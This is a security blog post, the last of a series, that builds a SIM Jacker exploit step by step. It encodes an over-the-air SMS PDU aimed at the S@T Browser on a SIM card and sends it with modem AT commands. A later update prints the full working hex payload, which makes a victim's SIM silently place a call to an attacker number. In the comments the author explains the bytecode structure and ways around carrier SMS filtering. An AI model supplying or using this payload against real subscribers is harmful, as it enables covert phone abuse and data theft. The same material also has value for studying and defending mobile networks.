Dissecting SIM Jacker – Part 4 of 4: Exploitation.

stk-feat-img

In previous articles (part 1, part 2 and part 3) we have setup the foundation for understanding the details of SIMs, SMS, SMS-Submit, SMS-Deliver, SMS-PP Data Download, Over The Air messages and the SIM Tester tool. In this article we will put all the pieces together and attempt to exploit the SIM Jacker vulnerability on one of our own SIM Cards.

There 3 main conditions that needs to be met in order to be able to exploit this vulnerability: 1) the SMS Center accepts and relays binary messages 2) the ability of the target device to receive SMS binary messages that contains (U)SIM Application Toolkit commands and 3) that the S@T Browser technology is deployed on the SIM Card and the Minimum Security Level is set to No Security applied.

Other conditions for the attack to be successful is that the SIM Card itself has 2 capabilities or services enabled, these are: Proactive UICC commands and Data Download to UICC, these services are usually enabled by default on SIM Cards and that’s why they are not part of the main conditions.

As we saw in part 3, Over The Air messages are essential for exploiting the vulnerability, in fact, the attack is executed by sending a specific type of OTA message to the victim. Let’s remember the format of on an SMS-Submit message that will work as an OTA:

sms-pp-data-download
OTA / SMS-PP Data Download message.

This is the format of an SMS-Submit message, that is, the message that originates from the attacker and is sent through the USB Modem, so, let’s go piece by piece:

Service Center Address (SCA)

The first piece is the Service Center Address, this is the address of the SMS Center, that is, the part of the provider’s infrastructure that relays messages. As we have mentioned in a previous article, this field can be set to it’s default value (that is, the value already set in the SIM Card) by using 0x00, so, the first piece is:

SCA = 0x00

First Octet (FO)

The second piece is the First Octet, from a previous article we had learnt that the coding of the first octet for an SMS-Submit is as follows:

sms-submit-fo
SMS-Submit first octet.

Since this is an SMS-Submit, we start by setting bits number 0 and 1 to “01″, this is the MTI (Message Type Identifier), other bits can be set to zero, except for bit number 6 which needs to be set to “1“, this is UDHI (User Data Header Indicator), so, the binary coding for the first octet will be:

01000001 = 41 in hex.

So, our second piece is:

FO = 0x41

Message Reference (MR)

The third piece is the Message reference and this can be set as follows:

MR = 0x00

Destination Address (DA)

The Destination Address is the address of the target, this value is coded as follows:

Length of address = 0x0B
Type of address = 0x91 (international)
Address = 50612345678F = 0x0516325476F8

So:

DA = 0x0B910516325476F8

Protocol Identifier (PID)

The Protocol Identifier has to be set to SIM Data Download, that is:

PID = 0x7F

Data Coding Scheme (DCS)

The Data Coding Scheme has to be set to Class 2, that is:

PID = 0xF6

User Data Length (UDL)

The User Data Length is the length in bytes of the user data, that is, the number of bytes that comprise the user data:

UDL = XX

User Data (UD)

The User Data contains the User Data Header and the Command Packet, if you remember, in the First Octet we set the UDHI (User Data Header Indicator) to indicate that the User Data will contain a User Data Header.

User Data Header Length (UDHL)

The User Data Header Length is the length in bytes of the User Data Header and is set as follows:

UDHL = 0x02

User Data Header (UDH)

The User Data Header is set such as that it indicates that the Command Packet will contain Security Headers, that is:

UDH = 0x7000

Command Packet (CP)

The Command Packet contains very important information about the security of the message, which application the message is directed to and what are the actual commands that we want to execute.

Command Packet Length (CPL)

The Command Packet Length is the length in bytes of the entire Command Packet:

CPL = YYYY

Command Header Length (CHL)

The Command Header Length is the length in bytes of the Command Header:

CHL = 0x0D

The Command Header is comprised of 6 different values:

Security Parameter Indicator (SPI)

The Security Parameter Indicator specifies whether or not any security will be applied to the message, in this case we set SPI as follows:

SPI = 0x0000

Ciphering Key Identifier (KIc)

The Ciphering Key Identifier identifies the type of ciphering used, we set this to:

KIc = 0x00

Key Identifier (KID)

The Key Identifier specifies the key that will be used for encryption, we set this to:

KID = 0x00

Target Application Reference (TAR)

The Target Application Reference identifies the application on the SIM Card we will be sending the message to, we set it to the S@T Browser:

TAR = 0x505348

Counter and Padding Counter (CNTR & PCNTR)

These values are set as follows:

CNTR = 0x0000000000
PCNTR= 0x00

Secured Data (S@T/STK Commands)

This is the most important part of the payload, it contains the commands that we want the S@T Browser application to execute on our behalf. These commands are constructed using STK Bytecode and it can be used, for example, to Setup a Call and Send Short Messages.

The S@T/STK Commands are set as follows:

S@T/STK Commands = 0x42230121…2D0C100383…2B00

For security reasons, I won’t provide the entire hex representation of these commands, as this could be used to abuse this vulnerability in the wild.




Proof of Concept

For our proof of concept below, we will be using bytecode commands that set up a call on the device of our victim to another device controlled by the attacker.

The victim does not notice that he/she has received the message, but, a prompt is shown to the user for accepting the call. Using bytecode commands, for instance, we could also make the victim send short message with sensitive information without the user even noticing.

SMS-Submit

Therefore, our SMS-Submit message looks like this:

SMS-Submit exploiting SIM Jacker.

Which is the same as shown below (where XX and YYYY are just the lengths of the afterwards bytes):

0041000B910516325476F87FF6XX027000YYYY0D0000000050534800000000000042230121…2D0C100383…2B00

Sending the message

As we saw in part 1 of these series, we will be using an USB modem to send our attacking message, to do so, we connect to the modem with screen:

screen /dev/ttyUSB0

We now enable PDU mode:

AT+CMGF=0 (ENTER)
OK

And finally send the message (see the end of this article for an update on the full payload):

AT+CMGS=69 (ENTER)
>0041000B910516325476F87FF6XX027000YYYY0D0000000050534800000000000042230121…2D0C100383…2B00 (CTRL + Z)

The Victim

The victim receives the message as an SMS-Deliver which, in turn, is transformed into an SMS-PP Data Download. That transformed messaged is handled by the SIM Card (since it is a binary message) and the SIM Card application (S@T Browser) executes the S@T/STK commands specified in the message itself, in this case, that means setting up a call.

Do note that the victim does not notice that he/she has received an SMS, however, for this specific proof of concept, the victim receives a prompt for accepting the call (to an attacker-controlled device), so, the victim will see something like the shown below (do note that the attacker could also execute other actions like sending an SMS message with sensitive information):

SIM Jacker victim.

If the victim accepts the call, the victim will call the attacker-controlled number we have set up in the Secured Data (S@T/STK Commands). We can see this in the following video:

Exploiting SIM Jacker.

That’s it! Thanks!

UPDATE (07/12/2020)

It’s been a while since this publication, so, I thought I’d share the whole payload for the sake of completeness. The AT command with the SMS-SUBMIT message is as shown below (with length of 69):

AT+CMGS=69
>0041000B912143658709F07FF63802700000330D0000000050534800000000000042230121020744382E3130353105160604313035312D0C1003830607912143658709F02B00

Do note that the target of the attack is specified as the first instance of 2143658709F0 and the second instance is the phone number the target SIM will call (since we are dealing with an STK command to setup call).

The value 2143658709F0 means the phone number is (123) 45678900.

53 Comments

  1. … Deck tag attributes presence flag should be set, due to the reason that dynamic deck will not be cached by the S@T browser

    1. Hello, thanks for your comment,

      The Deck Tag ID is set after “0x42230121” and followed by the rest of the payload, however, I didn’t thought it was a good idea to give up the entire payload, so, I cropped it.

      Regards,
      Cristian

  2. Hi Cristian, thanks for your explanation!

    About the payload, you manually build it or theres a lib or something to create them?

    Regards,
    Fernando

    1. Hello, thanks for your comment.

      Mostly manually, by going through the STK bytecode documentation and also with the help of open tools such as the SIM Tester by SRLabs. Thanks!

      Regards,
      Cristian

  3. Hi, as I’m relatively new to these types of vulnerabilities associated with sims, I can’t quite understand the STK bytecode documentation. Could you tell me where to start to learn this type of vulnerability so that I can generate the payload on my own?

  4. Hi, thanks for the article.
    Do you start any variables before the STK command? or follow the order: push> deck> card> STK command?

    1. Hi Pedro,

      I start by constructing the SMS-SUBMIT message and, when it comes to the S@T Setup Call part I follow the Push (0x42) > Deck > Card > Generic STK Command (2D). And this generic command follows the Setup Call (0x10) > Qualifier (0x03) > DestinationTag (0x83) > AddressTag (06) > Address (0x91…) > 2B00 format.

      Regards,
      Cristian

    2. Did you used, Deck > Card template tag > card? or just Deck > card? The setup call has an Alpha identifier “Accept call?” ? The “2B00” is the Exit tag without length?

      Thanks, Pedro.

    3. Hello, please note that I have recently added an update to the end of this article, go ahead and take a look at it.

      Thanks,
      Cristian

  5. I have a question about figure 3 of the adaptiveMobile security report. The final step is setting payload as variable 5. But how can we set variable as SMS data (The SMS data of the STK SEND-Short-Message)?

    1. Hello, please note that I have recently added an update to the end of this article, go ahead and take a look at it.

      Thanks,
      Cristian

  6. Hi Cristian!

    Great job! Thanks for sharing so much knowledge.

    Unfortunately, the links for the files you posted on another comment are unavaliable right now and would very much like to read them.

    (PUSH Command – Section 6
    SAT SetUp Call – Section 5.8.7)

    Would you mind uploading a copy somewhere so i can download it?
    Thanks you so much and congratulations on the great work.

    Regards,

    Elliot

    1. Hello Elliot,

      Unfortunately, I didn’t keep copy of these files, there seems to be a problem with simalliance.org, hopefully the domain will come back online at some point.

      Regards,
      Cristian

  7. Hi Cristian,

    I have a SIM card with TAR 505378 Critical weakness found, a network that allows you to send binary SMS and Receive it, however when I send the attack nothing happens … Maybe the card does not have S @ T Browser technology? or is something from the network?

    Thanks Pedro.

    1. Hi Pedro,

      Those two conditions are usually the most important to meet in order to exploit it. I would make sure to configure the phone numbers correctly (I have added more details on this at the end of the article, go ahead and take a look).

      Also, one of the mitigations is for the SMS center to filter either by message type (binary) or by protocol identifier (PID), this could be the case here, but, I would keep trying since these mitigations are not common.

      Regards,
      Cristian

  8. Thank you! It worked perfectly with my SIM card. I’m trying to use a variable in an STK command, but I’m not getting it. Do you have any idea how to do it?

    1. Hello David,

      Glad to hear it worked fine for you. I haven’t worked with variables in the STK command yet, what goal are you trying to achieve?

      Regards,
      Cristian

  9. Hi Cristian,
    I have 2 SIM cards,
    Both SIM cards are for one operator,
    I receive this message for the SIM card 1 from the SIM Tester:

    The following TARs/keysets accepted and executed a S@T request without any security:
    TAR keyset Response packets
    505348 1 D0128103011003820281830607912143658709F0
    …..

    And SIM Jacker works. (Based on your training)
    But I receive this message for the SIM card 2 from the SIM Tester:

    The following TARs/keysets returned a valid response without any security:
    TAR keyset Response packets
    505348 1 027100000B0A50534800000000000003
    …..

    And SIM Jacker does not work. (Based on your training)

    Why?

    1. Hello,

      Hard to say, first I would double check the message configuration, it’s easy to make a simple mistake in the hex code and don’t get the correct results when sending the attack. I’d also check that both SIMs are using the same SMS Center, it might be the case that they are different and one is vulnerable (relays binary messages without any filtering) while the other is not (does not relays bin messages).

      Also, you are receiving 2 different messages, one says “TARs/keysets accepted and executed a S@T request” and the other says “TARs/keysets returned a valid response“, the SIMJacker attack exploits a misconfigured S@T Browser, the second message might hint to a different vulnerability, but, it’s hard to say why they would be different if they are from the same provider.

      Thanks,
      Cristian

  10. OK,
    Thanks,
    If SMS center filters binary messages, Is there a way to solve it?
    For example, using another SMS center or anything else…

    1. There is not much you can do with the SMS Center itself as this is controlled by the service provider.

      You could try to force the SIM Card to use a different SMS Center, you would specify that in the first field of the SMS-Submit message, this first field is known as SCA (Service Center Address) and you could use it to specify a different SMS Center.

      In the example described in the article above we are using “00” as SCA, which means that the SIM Card will use the default SCA already hardcoded in the SIM information, the idea would be to set this field to a specific value instead, so that the SIM uses a different SMS Center.

      Regards,
      Cristian

  11. Hello Cristian,
    Can I convert User Data (UD) to GSM 7-bit? (instead of 8-bit)
    And change Data Coding Scheme (DCS) from 8-bit to 7-bit (class 2 – SIM/USIM-specific)
    For example 0xF6 —> 0xF2
    Because my provider does not support DCS for 8-bit. like 0xF6
    It only supports DCS for 7-bit. like 0xF2
    Of course it supports the class 2.
    I do not have access to another SMS center.
    Thanks…

    1. Hello Alex,

      It should work in my opinion, but I’m not sure! My thinking is that as long as both the SMS center and the SIM card support the 7 bit DCS, then you should be able to code data using that scheme.

      Regards,
      Cristian

  12. Hello Cristian,
    Can you help me how convert data from binary 8-bit to GSM 7-bit?
    I do not know which part of PDU and how to convert correctly.
    What should I change, add or remove?
    I tried hard but I couldn’t.
    I do not know what I am doing wrong.
    I just want an example.
    Please…
    Thanks.

  13. My provider has several SMS center.
    But when I use a SMSC other than the default SMSC, there is no change and only default SMSC is used.
    I tested this both in the AT command (PDU) and on Android.
    Why?

    1. Hi Jessie,

      You should be able to set the SMS Center (SCA) in the first byte of the SMS-SUBMIT message. If that does not work, I believe you should also be able to set the SCA with the +CSCA AT command.

      Regards,
      Cristian

  14. Hello,
    As I said in the previous comment,
    My SIM card received this message from SIMTester results:

    The following TARs/keysets returned a valid response without any security:
    TAR keyset Response packets
    505348 1 027100000B0A50534800000000000003

    This is command:

    FUZZER = 14 – KEYSET = 1 – SPI = 1C31 – KIC = 15 – KID = 10 – TAR = 505348 – CNTR = 0000000001 – PCNTR = 05

    This is response:

    027100000B0A50534800000000000003 (Status: 03 – Error: CNTR high)

    I asked srlabs.de about it and they answered me:

    The vulnerability you found is an applications on the SIM that appears to be unprotected [1].

    Leaving an applet unprotected is never a good idea, so this is reported as a vulnerability without knowing what exactly the applet does.

    In this particular case, you have indeed found Simjacker since the applet in question is the S@T Browser [2].

    Hope this helps,

    -Karsten

    [1] https://srlabs.de/bites/sim_attacks_demystified/
    [2] https://securitygrind.com/dissecting-sim-jacker-part-4-of-4-exploitation/

    But SIM Jacker does not work. (Based on your training)

    Why?

    1. From the SIMTester result it does look like it is vulnerable, but I wouldn’t be able to say why it’s not working.

      As mentioned before, I’d recommend you go through the payload again and make sure everything is in the right place. Other than that I can only advice to keep trying, maybe testing on even other SIM Card might be a good idea at this point.

      Regards,
      Cristian

    2. hello can i get your number.. if you can get this number pls check on whatsapp +255627257164

    1. Hi Kumar,

      I’m not sure where it can be downloaded from, however, it usually comes in the SIM Card by default, I believe it is widely used by providers.

      Regards,
      Cristian

    1. Hello,

      I do not have the payload for Short Message, but certainly is an interesting case.

      Regards,
      Cristian

  15. i have the sms payload but it stopped working after some update they changed the dialing numbering, i think its easy to fix it back, but ive been busy and havent fixed it yet.

    1. Hello,

      I only worked on the call payload but not the SMS payload. You’re welcome to share the SMS payload here for everybody to take a look at it.

      Regards,
      Cristian

  16. i have the payload for sms it stopped working after some call update i think its fixable, can someone help?

    1. Hello,

      I can take take a look at it if you share more details on what you are doing and what issues are you facing?

      Regards,
      Cristian

  17. hi thank for you this is best post for sim jacker
    i learned many thing by you

    i need to know payload how to make i download all pdf but this is hard to learn
    can explain
    S@T COMMAND SETUP CALL
    42 230121 020744382E313035310516060431303531 2D 0C 10 03 83 06 0791 2143658709F0 2B00
    Push (0x42)
    Deck ?
    Card ?
    Generic STK Command (2D)
    Setup Call (0x10)
    Qualifier (0x03)
    DestinationTag (0x83)
    AddressTag (06)
    Address (0x91…)
    2B00 format ?

    020744382E313035310516060431303531 this code please

    1. Hello,

      Thanks for the comment. There is a full payload example at the end of the article (which I added afterwards), might help you get a better idea of it.

      Regards,
      Cristian

  18. hello cristian sorry for the double post i though it didnt upload, is there a way to sendo you the sms payload since i dont want to post it here we use it to help ppl and dont want it to get in wrong hads you know.

  19. Hello Christian, I’ve got to the point of disecting your payload, to identify where tags and bytecodes came from.
    I can send SMS-SUBMIT in PDU format without payload successfully, but when I’ve send your payload to a number, command is returning “CMS ERROR 513” or “CMS ERROR 515”.
    I’ve just modified your payload, change the receivers number and the number to be called. Im using a USB-modem to send SMS. Can you help me work this out?

  20. Hello Cristian R

    How we cant contact with you we have found some topics to cooperate with you.

    Thanks Islombek

  21. Hello Cristian first of all thanks for the amazing knowledge that you shared in this article but I would like to inquire if these payloads are still valid because I was trying them out and it gives me a +CMS OK but nothing happens on the target device and also the SIM card in the modem is credited.

  22. Looking for a guy called skewetande here. I believe he piggybacked of your knowledge to harass his neighbor.

  23. Hello, is there way to switch off binary SMS receival in the device? Perhaps if the phone is rooted with some app? Because if the SMS center receives binary SMS`s and its SIM card have the S@T browser what else one could do to stop these vulnerabilities?

  24. Hi, I would like to understand something more. How can I understand if today the SIMs are protected or not? when an operator sends you text messages in the background that you don’t see to configure the connection parameters, does it make me assume that the bug is still active? how can I modify and protect the sim

Leave a Reply

Your email address will not be published. Required fields are marked *